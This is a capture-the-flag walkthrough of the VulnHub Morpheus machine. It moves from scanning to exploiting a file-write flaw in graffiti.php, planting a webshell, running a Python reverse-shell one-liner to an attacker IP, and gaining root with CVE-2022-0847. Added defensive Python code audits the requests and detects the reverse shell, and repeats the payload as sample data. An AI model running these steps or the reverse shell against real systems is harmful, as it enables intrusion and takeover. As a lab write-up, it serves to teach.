vulnhub_matrix-breakout-2-morpheus
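Preface
Target machine: matrix-breakout-2-morpheus
Attacker machine: kali2022.3
Target: matrix-breakout-2-morpheus
Challenge description:
This is the second in the Matrix-Breakout series, subtitled Morpheus:1. It is themed as a throwback to the first Matrix movie. You play Trinity, trying to investigate a computer on the Nebuchadnezzar that Cypher has locked everyone else out of, which holds the key to a mystery.
Difficulty: medium
Information gathering
Host discovery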
nmap -sP 192.168.70.0/24
┌──(root㉿kali)-
└─# nmap -sP 192.168.70.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-31 06:43 EST
Nmap scan report for 192.168.70.1
Host is up (0.00024s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.70.2
Host is up (0.00013s latency).
MAC Address: 00:50:56:FE:42:C8 (VMware)
Nmap scan report for 192.168.70.151
Host is up (0.00015s latency).
MAC Address: 00:0C:29:99:AE:0E (VMware)
Nmap scan report for 192.168.70.254
Host is up (0.00026s latency).
MAC Address: 00:50:56:E9:E4:7C (VMware)
Nmap scan report for 192.168.70.137
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 6.09 seconds
The target's IP is identified by matching the MAC address that VMware shows for the target VM.
https://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131202227372-506916171.png
This shows the target is 192.168.70.151.
Port scan
nmap -A -p- 192.168.70.151
┌──(root㉿kali)-
└─# nmap -A -p- 192.168.70.151
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-31 06:44 EST
Nmap scan report for 192.168.70.151
Host is up (0.00042s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|_256 aa83c351786170e5b7469f07c4ba31e4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.51 ((Debian))
|_http-title: Morpheus:1
|_http-server-header: Apache/2.4.51 (Debian)
81/tcp open  http    nginx 1.18.0
|_http-title: 401 Authorization Required
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_Basic realm=Meeting Place
|_http-server-header: nginx/1.18.0
MAC Address: 00:0C:29:99:AE:0E (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
The scan shows a port 80 and a port 81.
Inspecting the websites
Port 80 serves a web page
https://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131203829507-944549537.png
Port 81 presents a login prompt
https://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131203855686-1220628636.png
Use a browser plugin to view information about the site
https://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131203929472-1217854473.png
Take a look at robots.txt
https://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131212027942-2131690322.png
Nothing useful there
Website directories
┌──(root㉿kali)-
└─# dirsearch -u http://192.168.70.151/
_|. _ ____ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/192.168.70.151/-_23-01-31_08-33-34.txt
Error Log: /root/.dirsearch/logs/errors-23-01-31_08-33-34.log
Target: http://192.168.70.151/
Starting:
403 -279B- /.htaccess.bak1
403 -279B- /.ht_wsr.txt
403 -279B- /.htaccess.sample
403 -279B- /.htaccess.save
403 -279B- /.htaccess_extra
403 -279B- /.htaccess_orig
403 -279B- /.htaccessBAK
403 -279B- /.htaccess_sc
403 -279B- /.htaccessOLD
403 -279B- /.htaccessOLD2
403 -279B- /.html
403 -279B- /.htm
403 -279B- /.htpasswds
403 -279B- /.httr-oauth
403 -279B- /.htaccess.orig
403 -279B- /.htpasswd_test
403 -279B- /.php
200 -348B- /index.html
301 -321B- /javascript->http://192.168.70.151/javascript/
200 - 47B- /robots.txt
403 -279B- /server-status
403 -279B- /server-status/
Task Completed
Nothing of value was found, so switch tools and keep scanning with dirbuster.
https://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131222948371-1506440697.png
Set the wordlist and the URL, then press Start
https://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131231221287-772938290.png
Vulnerability discovery
https://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131231223027-47343206.png
A PHP file turned up; browse to ip/graffiti.php to take a look
https://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131231405640-264492798.png
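Enter a single ' here to test for SQL injection, and capture the request while doing so. The captured request contains a graffiti.txt; browsing to that file shows that the ' just submitted was written into it, so the conclusion is that an arbitrary file write vulnerability exists.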
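A request-side check for the behaviour described above, as an added example that is not part of the original write-up: it flags form bodies posted to graffiti.php whose write target is anything other than graffiti.txt, or whose text carries PHP open tags. The parameter names file and message and the sample bodies are assumptions; the page only shows that the request carries graffiti.txt.

```python
from pathlib import PurePosixPath
from urllib.parse import parse_qs

# Assumed (hypothetical) parameter names; the write-up does not list them.
FILE_PARAM = "file"        # client-supplied name of the file to write
TEXT_PARAM = "message"     # text that ends up in that file
EXPECTED_TARGET = "graffiti.txt"
EXEC_SUFFIXES = {".php", ".phtml", ".phar"}
CODE_MARKERS = ("<?php", "<?=")


def audit_graffiti_post(body):
    """Return a list of findings for one form-encoded POST body."""
    form = parse_qs(body, keep_blank_values=True)
    findings = []
    for target in form.get(FILE_PARAM, []):
        path = PurePosixPath(target)
        if target != EXPECTED_TARGET:
            findings.append("unexpected write target: %r" % target)
        if path.is_absolute() or ".." in path.parts:
            findings.append("target leaves the intended directory")
        if any(s.lower() in EXEC_SUFFIXES for s in path.suffixes):
            findings.append("target has a server-executable extension")
    for text in form.get(TEXT_PARAM, []):
        if any(marker in text.lower() for marker in CODE_MARKERS):
            findings.append("text contains a server-side code marker")
    return findings


# Constructed sample bodies, not captured from the target.
SAMPLE_BODIES = [
    "message=hello&file=graffiti.txt",                     # normal use
    "message=%27&file=graffiti.txt",                       # the ' probe from the text
    "message=%3C%3Fphp+echo+1%3B+%3F%3E&file=notes.php",   # code into a .php file
    "message=x&file=..%2F..%2Ftmp%2Fx",                    # path traversal
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(body, "->", audit_graffiti_post(body) or "ok")
```

The lasting fix belongs in graffiti.php itself: write to a fixed server-side path and never take the target file name from the request.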
Exploitation - arbitrary file write
Getting a webshell
Write a one-line webshell
https://img2023.cnblogs.com/blog/2830174/202301/2830174-20230131235414436-1792128219.png
Connect to the webshell with AntSword
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201000607899-1252371102.png
Browse the root directory; flag1 is found there
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201163445645-1801233844.png
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201163457167-1595457543.png
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201163622038-881202210.png
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201171258942-1504301684.png
Kernel information
cat /etc/*-release
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201001742797-2088836339.png
Reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.70.137",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201163041183-434626596.png
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201163056357-1359658885.png
The reverse shell connects successfully
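How the step above looks from the defender's side, as an added example that is not part of the original write-up: a triage rule over process-exec events that flags a web-server account running inline interpreter code that ties a socket to a shell, and extracts the remote endpoint. The event layout, account names and sample events are assumptions constructed for the example.

```python
import re

WEB_USERS = {"www-data", "apache", "nginx"}   # accounts web servers commonly run as
INTERPRETERS = {"python", "python3", "perl", "php", "ruby"}
INLINE_FLAGS = ("-c", "-e", "-r")             # "run this string as code" options
ENDPOINT = re.compile(r"""connect\(\(\s*["']([^"']+)["']\s*,\s*(\d+)\s*\)\)""")


def triage_exec(event):
    """Return a finding dict, or None when the exec event looks benign."""
    argv = event.get("argv", [])
    if event.get("user") not in WEB_USERS or len(argv) < 3:
        return None
    name = argv[0].rsplit("/", 1)[-1]
    if name not in INTERPRETERS or argv[1] not in INLINE_FLAGS:
        return None
    code = argv[2]
    signals = [s for s in ("socket", "dup2", "/bin/sh", "/bin/bash") if s in code]
    # Require a socket plus fd redirection or a shell path.
    if "socket" not in signals or len(signals) < 2:
        return None
    match = ENDPOINT.search(code)
    remote = (match.group(1), int(match.group(2))) if match else None
    return {"pid": event.get("pid"), "signals": signals, "remote": remote}


def scan(events):
    return [f for f in map(triage_exec, events) if f]


# Constructed exec events, in the shape one might derive from execve audit records.
SAMPLE_EVENTS = [
    {"pid": 2101, "user": "www-data", "argv": ["python3", "/var/www/html/tools/report.py"]},
    {"pid": 2102, "user": "root",
     "argv": ["python3", "-c", "import socket;print(socket.gethostname())"]},
    {"pid": 2103, "user": "www-data", "argv": ["python3", "-c",
        'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);'
        's.connect(("192.168.70.137",9999));os.dup2(s.fileno(),0);'
        'p=subprocess.call(["/bin/sh","-i"]);']},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```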
Privilege escalation
Upload linpeas.sh
Upload the script with AntSword
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201171444365-731115679.png
Make it executable and run it
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201172052173-621930353.png
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201174523341-1081674200.png
Quite a lot of vulnerability information was detected; CVE-2022-0847 is used here for privilege escalation
Upload the exploit with AntSword and run it
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201175635266-875622434.png
FLAG
FLAG1
In the filesystem root directory
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201175813692-622059468.png
FLAG2
In the root user's directory
https://img2023.cnblogs.com/blog/2830174/202302/2830174-20230201175850758-91042889.png